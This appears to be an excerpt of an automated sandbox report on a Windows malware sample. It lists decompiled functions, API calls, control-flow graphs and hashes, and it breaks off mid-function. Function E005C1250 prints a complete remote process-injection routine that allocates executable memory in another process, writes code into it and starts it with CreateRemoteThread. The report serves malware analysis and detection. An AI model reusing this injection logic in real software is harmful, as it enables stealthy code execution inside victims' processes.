                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ComputerHeapName$AllocateCountProcessSleepTickVersion
                          • String ID:
                          • API String ID: 3448490110-0
                          • Opcode ID: 94c6a425e93a3fe4352c7f426c21d0368bd22d5a8709b45178e5248bca08d49c
                          • Instruction ID: 0d654c773350bd70ff6a655a24ce4960e30c203c4094d0eb33c0c6254a352225
                          • Opcode Fuzzy Hash: 94c6a425e93a3fe4352c7f426c21d0368bd22d5a8709b45178e5248bca08d49c
                          • Instruction Fuzzy Hash: 2B41C3B15046059FDB30BF68DC89A6A7BE9FF94304F09482FE485C7252F6758A44CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • 501: 5d3200-5d322d, call 5d6610, GetWindowsDirectoryW -> 504, 505
                          • 504: 5d322f-5d3234 -> 506
                          • 505: 5d3236-5d323a -> 506
                          • 506: 5d3241-5d3291, GetVolumeInformationW -> 507
                          • 507: 5d3296-5d329d -> 507, 508
                          • 508: 5d329f-5d32e7, call 5d4520 * 2, call 5d68e0
                          C-Code - Quality: 92%
                          			E005D3200(void* __eflags, intOrPtr _a4) {
                          				char _v216;
                          				signed short _v736;
                          				char _v752;
                          				intOrPtr _v758;
                          				signed int _v762;
                          				short _v764;
                          				intOrPtr _v768;
                          				short _t20;
                          				void* _t24;
                          				signed int _t28;
                          				signed int _t29;
                          				WCHAR* _t32;
                          				signed int _t33;
                          				WCHAR* _t34;
                          				intOrPtr _t37;
                          				DWORD* _t38;
                          				void* _t40;
                          				intOrPtr* _t41;
                          				DWORD* _t42;

                          				_t41 = _t40 - 0x2f4; // 0x005d3204
                          				_t34 =  &_v736; // 0x005d3211
                          				 *_t41 = 0; // 0x005d3215
                          				E005D6610(_t34, 0, 0x208); // 0x005d321b: zero the 0x208-byte (260 WCHAR) path buffer
                          				_t42 = _t41 + 0xc; // 0x005d3220
                          				if(GetWindowsDirectoryW(_t34, 0x208) == 0) { // 0x005d322d: drive letter is taken from the Windows directory
                          					_t20 = 0x43; // 0x005d3236: fallback to 'C' when the call fails
                          					_v736 = 0x43; // 0x005d323a
                          				} else { // 0x005d322f
                          					_t20 = _v736 & 0x0000ffff; // 0x005d322f
                          				} // 0x005d322f
                          				_t37 = _a4; // 0x005d3241
                          				_t32 =  &_v752; // 0x005d3248
                          				_t38 = _t42; // 0x005d324c
                          				 *_t32 = _t20; // 0x005d324e
                          				_t32[1] = 0x5c003a; // 0x005d3253: L":\" follows the letter, giving the root path "<drive>:\"
                          				_t32[3] = 0; // 0x005d325a
                          				GetVolumeInformationW(_t32, 0, 0, _t38, 0, 0, 0, 0); // executed, 0x005d3268: _t38 is lpVolumeSerialNumber, all other outputs are ignored
                          				_t28 =  *_t38; // 0x005d326e: volume serial number
                          				_t35 = _t28 + _t28; // 0x005d3271
                          				_t29 = _t28 << 3; // 0x005d327b
                          				_v768 = _t28 + _t28; // 0x005d327e
                          				_v764 = _t28 * 4; // 0x005d3282
                          				_t24 = 0xfffffff8; // 0x005d3287
                          				_t33 = _t29; // 0x005d328c
                          				 *_t38 = _t29; // 0x005d328e
                          				_v762 = _t29; // 0x005d3291
                          				do { // 0x005d3296: eight further doublings of the serial
                          					_t33 = _t33 + _t33; // 0x005d3296
                          					 *(_t42 + _t24 + 0x14) = _t33; // 0x005d3298
                          					_t24 = _t24 + 1; // 0x005d329c
                          				} while (_t24 != 0); // 0x005d329c
                          				 *_t42 = _t33; // 0x005d329f
                          				E005D4520(_t37, 0xb0); // 0x005d32a8: E005D4520 fills a buffer from a string index (in E005C1250 its output is handed to GetModuleHandleW)
                          				E005D4520( &_v216, 0xb1); // 0x005d32bd
                          				_push(_v758); // 0x005d32ce
                          				_push(_t29 & 0x0000fff8 | 0x00000001); // 0x005d32d2
                          				return E005D68E0(_t37, 0x64,  &_v216, _t35); // 0x005d32e7: output buffer, 0x64, string 0xb1 and the serial-derived values; consistent with a formatted-print helper (inference, not confirmed by the API trace)
                          			}

                          APIs
                          • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 005D3225
                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005D3268
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: DirectoryInformationVolumeWindows
                          • String ID: C
                          • API String ID: 3487004747-1037565863
                          • Opcode ID: d129454c6ccfdb04b4fdfc56bde74325a06402140aa36e0f9f8b3a0e2255948f
                          • Instruction ID: 80a9dfd531c61a2a22077ebb29f3e3bc9ebf92e95ff5af2229838c549ddc7ddb
                          • Opcode Fuzzy Hash: d129454c6ccfdb04b4fdfc56bde74325a06402140aa36e0f9f8b3a0e2255948f
                          • Instruction Fuzzy Hash: 3621C170505301ABE7209F18AC89B7B7BECEF85708F00452EF84896251E3359A09C762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 16%
                          			E005CD8B0(intOrPtr* __ecx) {
                          				intOrPtr _t7;
                          				intOrPtr _t8;
                          				intOrPtr _t12;
                          				void* _t15;
                          				intOrPtr* _t20;
                          				void* _t21;
                          				intOrPtr _t23;

                          				 *((short*)(__ecx + 0x14)) = 0; // 0x005cd8bb: clear the object's fields +4 .. +0x14
                          				_t20 = __ecx; // 0x005cd8c1
                          				 *((intOrPtr*)(__ecx + 0x10)) = 0; // 0x005cd8c3
                          				 *((intOrPtr*)(__ecx + 0xc)) = 0; // 0x005cd8c6
                          				 *((intOrPtr*)(__ecx + 8)) = 0; // 0x005cd8c9
                          				 *((intOrPtr*)(__ecx + 4)) = 0; // 0x005cd8cc
                          				_t23 =  *0x5d9bb4; // 0x1 at dump time; 0x005cd8cf: one-time initialisation flag
                          				if(_t23 == 0) { // 0x005cd8d5
                          					_t15 = _t21; // 0x005cd8d7
                          					E005D4520(_t15, 0x7a); // 0x005cd8dc: string 0x7a is fetched into a stack buffer
                          					_t12 =  *0x5d9da8(_t15, 0, 0, 0, 0); // executed, 0x005cd8e9: five-argument call through a resolved pointer, string first
                          					 *0x5d9adc = _t12; // 0x005cd8ef: the returned handle is kept in a global
                          					 *0x5d9dbc(_t12, 0x15f90, 0x15f90, 0x2bf20, 0x927c0); // 0x005cd906: handle followed by 90000, 90000, 180000, 600000; the pair of calls matches the WinHttpOpen / WinHttpSetTimeouts signatures (inference only, the pointers are not resolved in this trace)
                          					InitializeCriticalSectionAndSpinCount(0x5d9b64, 0x800); // 0x005cd916
                          					 *0x5d9bb4 =  *0x5d9bb4 + 1; // 0x005cd91c
                          				} // 0x005cd91c
                          				 *0x5d9d54(0x5d9b64); // 0x005cd928: RtlEnterCriticalSection (see the API list below)
                          				_t7 =  *0x5d9c24; // 0x0 at dump time; 0x005cd92e
                          				_t8 = _t7 + 1; // 0x005cd933
                          				 *0x5d9c24 = _t8; // 0x005cd934: global counter, incremented under the lock
                          				 *_t20 = _t8; // 0x005cd939: the new counter value becomes the object's first field
                          				 *0x5d9d9c(0x5d9b64); // 0x005cd93c: RtlLeaveCriticalSection (see the API list below)
                          				return _t20; // 0x005cd94d
                          			}

                          APIs
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(005D9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 005CD916
                          • RtlEnterCriticalSection.NTDLL(005D9B64), ref: 005CD928
                          • RtlLeaveCriticalSection.NTDLL(005D9B64), ref: 005CD93C
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CriticalSection$CountEnterInitializeLeaveSpin
                          • String ID:
                          • API String ID: 29772495-0
                          • Opcode ID: 5eaf78b0c458fc2ed2a7f59c840898fd9f8bb5bdb9baa265ca2e68cf5c26cbed
                          • Instruction ID: f3ec616f4f0ea8934054acdc5adde4b286dfdd7b9427ab7d2b00acdfb8bfb93f
                          • Opcode Fuzzy Hash: 5eaf78b0c458fc2ed2a7f59c840898fd9f8bb5bdb9baa265ca2e68cf5c26cbed
                          • Instruction Fuzzy Hash: 33018071A02200AFD330AF29FD49E26BFF9FBE5706B10402FB4499A261D675580ADB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • 539: 5d2d90-5d2d9d, CoInitializeEx -> 540, 541
                          • 540: 5d2d9f-5d2db8, CoInitializeSecurity -> 541
                          • 541: 5d2dbb-5d2dbe
                          APIs
                          • CoInitializeEx.OLE32(00000000,00000000), ref: 005D2D95
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 005D2DAD
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Initialize$Security
                          • String ID:
                          • API String ID: 119290355-0
                          • Opcode ID: 27de70a4a0b6e3a36139ff3999576f180bc7850e2547e8f243be4a5e1fc0e517
                          • Instruction ID: 3df280e4141d91914cd85516da0977bab6ebf988b20997170204cf3b4bec5198
                          • Opcode Fuzzy Hash: 27de70a4a0b6e3a36139ff3999576f180bc7850e2547e8f243be4a5e1fc0e517
                          • Instruction Fuzzy Hash: C1D09EB1B061313AF6712A756C0DFB76A5DDB516A1F110357FD15E72D0D5208D4161F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • 547: 5c91e0-5c91e6 -> 548, 549
                          • 548: 5c91e8-5c91f1, RtlFreeHeap -> 549
                          • 549: 5c91f7
                          C-Code - Quality: 100%
                          			E005C91E0(void* _a4) {
                          				void* _t2;
                          				char _t3;

                          				_t2 = _a4; // 0x005c91e0
                          				if(_t2 != 0) { // 0x005c91e6: null-safe free wrapper
                          					_t3 = RtlFreeHeap( *0x5d9c2c, 8, _t2); // executed, 0x005c91f1: heap handle held in the global 0x5d9c2c
                          					return _t3;
                          				} // 0x005c91f1
                          				return _t2; // 0x005c91f7
                          			}

                          APIs
                          • RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 719fc889fff8b0e77ae11029f2af908541bd5855fcf2708b723db485a0fa25bc
                          • Instruction ID: 695847649a6fea488b4120f989b6394113ea3d785b3fd7b81222a78471a38f8b
                          • Opcode Fuzzy Hash: 719fc889fff8b0e77ae11029f2af908541bd5855fcf2708b723db485a0fa25bc
                          • Instruction Fuzzy Hash: C4C09274385202AFEF30DB60ED4DF267BADFB60B42F14845AB484D20B0CE61DC08EA10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • 550: 201317-201328 -> 552, 553
                          • 552: 20132a-20132c -> 554
                          • 553: 20135d-201361 -> 555, 556
                          • 554: 20132d -> 557, 558
                          • 555: 2013d1-2013d4 -> 561
                          • 556: 201363-201376 -> 559, 560
                          • 557: 2012b9-2012c8 -> 564, 565
                          • 558: 20132f-201334 -> 562, 563
                          • 559: 201378-20138c -> 561, 566
                          • 560: 2013c9 -> 567, 568
                          • 561: 2013d6-2013d8 -> 569
                          • 562: 201314-201316 -> 550
                          • 563: 201336 -> 553
                          • 564: 2012a2-2012aa -> 572, 573
                          • 565: 2012ca-2012cd -> 574, 575
                          • 566: 20138e-2013c8 -> 560
                          • 567: 2013eb-2013f0 -> 570, 571
                          • 568: 2013cb-2013ce -> 555
                          • 569: 2013da-2013e6 -> 569, 576
                          • 570: 2013f1-2013f4 -> 571
                          • 571: 2013f5-20140b -> 587
                          • 572: 201274-201277
                          • 573: 2012ac-2012b2 -> 577, 578
                          • 574: 2012a1 -> 564
                          • 575: 2012cf-2012de -> 579, 580
                          • 576: 2013e8-2013e9 -> 567
                          • 577: 2012b4-2012b6 -> 557
                          • 578: 20126c-201271 -> 572
                          • 579: 2012e0-201301 -> 554, 585
                          • 580: 201305-201312 -> 562
                          • 585: 201303-201304 -> 580
                          • 587: 20140f-20141c -> 592, 593
                          • 588: 201422-201447 -> 590, 591
                          • 590: 201449 -> 591
                          • 591: 20144c-20145d
                          • 592: 20141f, call 5ce270 -> 588
                          • 593: 20141f, call 5cc6d0 -> 588
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267051715.00201000.00000040.00000001.sdmp, Offset: 00201000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_201000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID: v
                          • API String ID: 0-1801730948
                          • Opcode ID: 7d89db41b94d6e1c363906cbe82fcfdb97da2f7f099210340ad5e17987c731bd
                          • Instruction ID: 1de268544d2e1e26f434b2939e944c78666a8fe8552c9be29acab3ea10b95d67
                          • Opcode Fuzzy Hash: 7d89db41b94d6e1c363906cbe82fcfdb97da2f7f099210340ad5e17987c731bd
                          • Instruction Fuzzy Hash: 875106B6514346DFDB08DF28D8459AABBA4FF84321B14869DF945CF283D731E862CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • 594: 201345-201376 -> 596, 597
                          • 596: 201378-20138c -> 598, 599
                          • 597: 2013c9 -> 600, 601
                          • 598: 2013d6-2013d8 -> 605
                          • 599: 20138e-2013c8 -> 597
                          • 600: 2013eb-2013f0 -> 602, 603
                          • 601: 2013cb-2013d4 -> 598
                          • 602: 2013f1-2013f4 -> 603
                          • 603: 2013f5-20141c -> 616, 617
                          • 605: 2013da-2013e6 -> 605, 606
                          • 606: 2013e8-2013e9 -> 600
                          • 612: 201422-201447 -> 614, 615
                          • 614: 201449 -> 615
                          • 615: 20144c-20145d
                          • 616: 20141f, call 5ce270 -> 612
                          • 617: 20141f, call 5cc6d0 -> 612
                          Memory Dump Source
                          • Source File: 00000002.00000002.267051715.00201000.00000040.00000001.sdmp, Offset: 00201000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_201000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
                          • Instruction ID: f256f06ced0485f9c003a4b5d2d738599165e3ddcbca6b60e46580fbb92b2f53
                          • Opcode Fuzzy Hash: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
                          • Instruction Fuzzy Hash: 8841B375200249DFDB08CF28D8459AABBA5FF48320B20869DF919CF392D730E952CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 100%
                          			E005C1250(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
                          				intOrPtr _v108;
                          				intOrPtr _v112;
                          				void* _v114;
                          				char _v116;
                          				char _v316;
                          				void* _v320;
                          				intOrPtr _v412;
                          				intOrPtr _v416;
                          				intOrPtr _v420;
                          				void* _v428;
                          				void* _v432;
                          				void _v436;
                          				void* _v444;
                          				void* _v448;
                          				_Unknown_base(*)()* _v452;
                          				intOrPtr _v456;
                          				void* _v460;
                          				void* _t120;
                          				void* _t136;
                          				struct HINSTANCE__* _t142;
                          				void* _t163;
                          				void* _t165;
                          				void* _t167;
                          				intOrPtr _t173;
                          				long _t180;
                          				WCHAR* _t181;
                          				SIZE_T* _t187;
                          				void* _t197;
                          				SIZE_T* _t204;
                          				void* _t206;
                          				intOrPtr* _t207;
                          				void* _t211;
                          				SIZE_T* _t213;
                          
                          				_t206 = __ecx;
                          				_t197 = 0;
                          				E005D6610( &_v452, 0, 0x1b4);
                          				_t213 =  &(( &_v444)[3]);
                          				if( *((intOrPtr*)(_t206 + 0x7c)) != 0) {
                          					L35:
                          					return _t197;
                          				}
                          				 *(_t206 + 0x88) = CreateEventW(0, 0, 0, 0);
                          				 *(_t206 + 0x8c) = CreateEventW(0, 0, 0, 0);
                          				 *(_t206 + 0x90) = CreateEventW(0, 1, 1, 0);
                          				 *((intOrPtr*)(_t206 + 0x70)) = _a4;
                          				_v456 = _a8;
                          				 *((intOrPtr*)(_t206 + 0x74)) = _a8;
                          				if(DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x88), _a4,  &_v436, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x8c), _a4,  &_v432, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x90), _a4,  &_v428, 0, 0, 2) == 0) {
                          					L23:
                          					_t197 = _v444;
                          					if(_t197 == 0) {
                          						CloseHandle( *(_t206 + 0x88));
                          						CloseHandle( *(_t206 + 0x8c));
                          						CloseHandle( *(_t206 + 0x90));
                          						if(_v436 != 0) {
                          							DuplicateHandle(_a4, _v436, GetCurrentProcess(), 0, 0, 0, 3);
                          						}
                          						if(_v432 != 0) {
                          							DuplicateHandle(_a4, _v432, GetCurrentProcess(), 0, 0, 0, 3);
                          						}
                          						if( *(_t206 + 0x90) != 0) {
                          							DuplicateHandle(_a4, _v428, GetCurrentProcess(), 0, 0, 0, 3);
                          						}
                          						if(_v452 != 0) {
                          							VirtualFreeEx(_a4, _v452, E005CA3A0(), 0x8000);
                          						}
                          						_t120 = _v448;
                          						_t207 = _t206 + 0x88;
                          						if(_t120 != 0) {
                          							VirtualFreeEx(_a4, _t120, 0x70, 0x8000);
                          						}
                          						 *((intOrPtr*)(_t207 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t207 + 0xc)) = 0;
                          						 *((intOrPtr*)(_t207 + 8)) = 0;
                          						 *((intOrPtr*)(_t207 + 4)) = 0;
                          						 *_t207 = 0;
                          						_t197 = _v444;
                          					}
                          					goto L35;
                          				} else {
                          					_t136 = VirtualAllocEx(_a4, 0, E005CA3A0(), 0x3000, 0x40);
                          					_v452 = _t136;
                          					if(_t136 == 0) {
                          						goto L23;
                          					}
                          					_t180 = E005CA3A0();
                          					_t187 = _t213;
                          					 *_t187 = 0;
                          					if(WriteProcessMemory(_a4, _v452, E005CA290, _t180, _t187) == 0 || _v460 != _t180) {
                          						goto L23;
                          					} else {
                          						_t181 =  &_v316;
                          						 *((intOrPtr*)(_t181 - 0x4c)) = 0;
                          						 *((intOrPtr*)(_t181 - 0x48)) = 0;
                          						 *((intOrPtr*)(_t181 - 0x24)) = 0;
                          						E005D4520(_t181, 0x56);
                          						_t142 = GetModuleHandleW(_t181);
                          						_t211 =  &_v116;
                          						 *(_t181 - 8) = _t142;
                          						E005D7160(_t211, 0x6e);
                          						 *((intOrPtr*)(_t181 - 0x6c)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x6f);
                          						 *((intOrPtr*)(_t181 - 0x68)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x70);
                          						 *((intOrPtr*)(_t181 - 0x64)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x71);
                          						 *((intOrPtr*)(_t181 - 0x60)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x72);
                          						 *((intOrPtr*)(_t181 - 0x5c)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x73);
                          						 *((intOrPtr*)(_t181 - 0x50)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x74);
                          						 *((intOrPtr*)(_t181 - 0x58)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E005D7160(_t211, 0x75);
                          						 *((intOrPtr*)(_t181 - 0x54)) = GetProcAddress( *(_t181 - 8), _t211);
                          						_t204 =  &(_t213[0x12]);
                          						if( *((intOrPtr*)(_t181 - 0x6c)) == 0 || _v420 == 0 || _v416 == 0 || _v412 == 0) {
                          							goto L23;
                          						} else {
                          							_t163 = VirtualAllocEx(_a4, 0, 0x70, 0x3000, 0x40);
                          							_v448 = _t163;
                          							if(_t163 == 0) {
                          								goto L23;
                          							}
                          							_v460 = 0;
                          							if(WriteProcessMemory(_a4, _t163,  &_v436, 0x70, _t204) == 0 || _v460 != 0x70) {
                          								goto L23;
                          							} else {
                          								_t165 = E005D1800(_a4);
                          								_v444 = _t165;
                          								if(_t165 == 0) {
                          									goto L23;
                          								}
                          								if( *((intOrPtr*)(_t206 + 0x78)) == 0) {
                          									_t167 = CreateRemoteThread(_a4, 0, 0, _v452, _v448, 4, 0);
                          									_v460 = _t167;
                          									if(_t167 == 0) {
                          										goto L23;
                          									}
                          									L20:
                          									ResetEvent( *(_t206 + 0x8c));
                          									ResetEvent( *(_t206 + 0x88));
                          									if(ResumeThread(_v460) != 0 && E005CB710(_t170, _t206) != 0) {
                          										 *((intOrPtr*)(_t206 + 0x94)) = _v452;
                          										_t173 = _v456;
                          										 *((intOrPtr*)(_t206 + 0x98)) = _t173;
                          										 *((intOrPtr*)(_t206 + 0x9c)) = _t173 +  ~E005CA290 + E005CA350;
                          										 *((intOrPtr*)(_t206 + 0x7c)) = 1;
                          										_v448 = 1;
                          									}
                          									goto L23;
                          								}
                          								_v320 = _t211;
                          								_v116 = 0x6858;
                          								_v112 = 0xe9500000;
                          								_v460 = 0;
                          								_v114 = _v448;
                          								_v108 = _v452 + 0xfffffff4 - _t165;
                          								if(WriteProcessMemory(_a4, _t165, _t211, 0xc, _t204) == 0 || _v460 != 0xc) {
                          									goto L23;
                          								} else {
                          									goto L20;
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005C128D
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005C1299
                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 005C12A8
                          • GetCurrentProcess.KERNEL32 ref: 005C12D2
                          • DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 005C12E6
                          • GetCurrentProcess.KERNEL32 ref: 005C12FE
                          • DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 005C1312
                          • GetCurrentProcess.KERNEL32 ref: 005C132A
                          • DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 005C1340
                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 005C1364
                          • WriteProcessMemory.KERNEL32(?,?,005CA290,00000000), ref: 005C1398
                          • GetModuleHandleW.KERNEL32(?), ref: 005C13CD
                          • GetProcAddress.KERNEL32(?,?), ref: 005C13F2
                          • GetProcAddress.KERNEL32(?,?), ref: 005C1406
                          • GetProcAddress.KERNEL32(?,?), ref: 005C141A
                          • GetProcAddress.KERNEL32(?,?), ref: 005C142E
                          • GetProcAddress.KERNEL32(?,?), ref: 005C1442
                          • GetProcAddress.KERNEL32(?,?), ref: 005C1456
                          • GetProcAddress.KERNEL32(?,?), ref: 005C146A
                          • GetProcAddress.KERNEL32(?,?), ref: 005C147E
                          • VirtualAllocEx.KERNEL32(?,00000000,00000070,00003000,00000040), ref: 005C14C6
                          • WriteProcessMemory.KERNEL32(?,00000000,?,00000070), ref: 005C14EF
                            • Part of subcall function 005D1800: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 005D181C
                            • Part of subcall function 005D1800: ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 005D1842
                            • Part of subcall function 005D1800: ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 005D1869
                            • Part of subcall function 005D1800: ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 005D1893
                          • WriteProcessMemory.KERNEL32(?,00000000,?,0000000C), ref: 005C1570
                          • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,00000000), ref: 005C15A3
                          • ResetEvent.KERNEL32(?), ref: 005C15BD
                          • ResetEvent.KERNEL32(?), ref: 005C15C5
                          • ResumeThread.KERNEL32(?), ref: 005C15CB
                          • CloseHandle.KERNEL32(?), ref: 005C162A
                          • CloseHandle.KERNEL32(?), ref: 005C1632
                          • CloseHandle.KERNEL32(?), ref: 005C163A
                          • GetCurrentProcess.KERNEL32 ref: 005C1643
                          • DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 005C165C
                          • GetCurrentProcess.KERNEL32 ref: 005C1669
                          • DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 005C1682
                          • GetCurrentProcess.KERNEL32 ref: 005C1691
                          • DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 005C16AA
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005C16CD
                          • VirtualFreeEx.KERNEL32(?,?,00000070,00008000), ref: 005C16F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process$Handle$AddressProc$CurrentDuplicateMemory$Event$CreateVirtual$CloseReadWrite$AllocFreeResetThread$InformationModuleQueryRemoteResume
                          • String ID: Xh$p
                          • API String ID: 2079587854-3369398867
                          • Opcode ID: 6f5026677acd8818881c87ac95d310dc1344d443946ef31a695a6adf6a69ad7e
                          • Instruction ID: 3e2805271dc62772223d12e78becf41ea65fb8528127dfc8d108301f615aca20
                          • Opcode Fuzzy Hash: 6f5026677acd8818881c87ac95d310dc1344d443946ef31a695a6adf6a69ad7e
                          • Instruction Fuzzy Hash: BFD14870504344AFEB21AF65CC49F6BBBE9FF85340F14482EB98996261EB71AC44DB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E005C5470(intOrPtr _a20) {
                          				int _v0;
                          				long _v28;
                          				WCHAR* _v32;
                          				intOrPtr* _v36;
                          				intOrPtr* _v40;
                          				char _v552;
                          				short _v1064;
                          				char _v1240;
                          				char _v1272;
                          				void _v1316;
                          				void* _v1320;
                          				struct _STARTUPINFOW _v1428;
                          				union _SID_NAME_USE _v1444;
                          				long _v1448;
                          				long _v1452;
                          				long _v1456;
                          				long _v1460;
                          				long _v1464;
                          				long _v1468;
                          				long _v1472;
                          				char _v1476;
                          				intOrPtr _v1480;
                          				struct _SID_IDENTIFIER_AUTHORITY _v1484;
                          				long _v1488;
                          				char _v1492;
                          				long _v1496;
                          				void* _v1500;
                          				long _v1504;
                          				void* _v1508;
                          				void* _v1512;
                          				void* _v1516;
                          				void* _v1520;
                          				long _v1524;
                          				intOrPtr _v1528;
                          				void* _v1532;
                          				char _v1536;
                          				void* _v1540;
                          				void* _v1544;
                          				void* _v1548;
                          				intOrPtr _v1556;
                          				void* _v1568;
                          				int _t95;
                          				intOrPtr _t96;
                          				void* _t97;
                          				intOrPtr _t98;
                          				void* _t99;
                          				intOrPtr _t107;
                          				int _t110;
                          				int _t112;
                          				int _t114;
                          				long _t115;
                          				void** _t116;
                          				int _t117;
                          				DWORD* _t118;
                          				int _t119;
                          				int _t120;
                          				int _t122;
                          				int _t125;
                          				int _t128;
                          				int _t130;
                          				int _t131;
                          				int _t132;
                          				void* _t134;
                          				struct _TOKEN_PRIVILEGES* _t147;
                          				DWORD* _t150;
                          				WCHAR* _t151;
                          				char* _t152;
                          				struct _STARTUPINFOW* _t153;
                          				int _t155;
                          				long _t158;
                          				int _t164;
                          				intOrPtr _t168;
                          				signed int _t174;
                          				void* _t176;
                          				void** _t178;
                          				WCHAR* _t179;
                          				union _SECURITY_IMPERSONATION_LEVEL _t180;
                          				intOrPtr _t181;
                          				intOrPtr _t182;
                          				void* _t186;
                          				void* _t187;
                          				HANDLE* _t189;
                          				void* _t191;
                          
                          				_t189 =  &_v1508;
                          				_t168 =  *0x5d9a8c; // 0x0
                          				_t180 = 0;
                          				_t153 =  &(_v1428.dwFlags);
                          				_v1516 = 0xffffffff;
                          				_v1484.Value = 0x100;
                          				_v1524 = 0;
                          				_v1504 = 0;
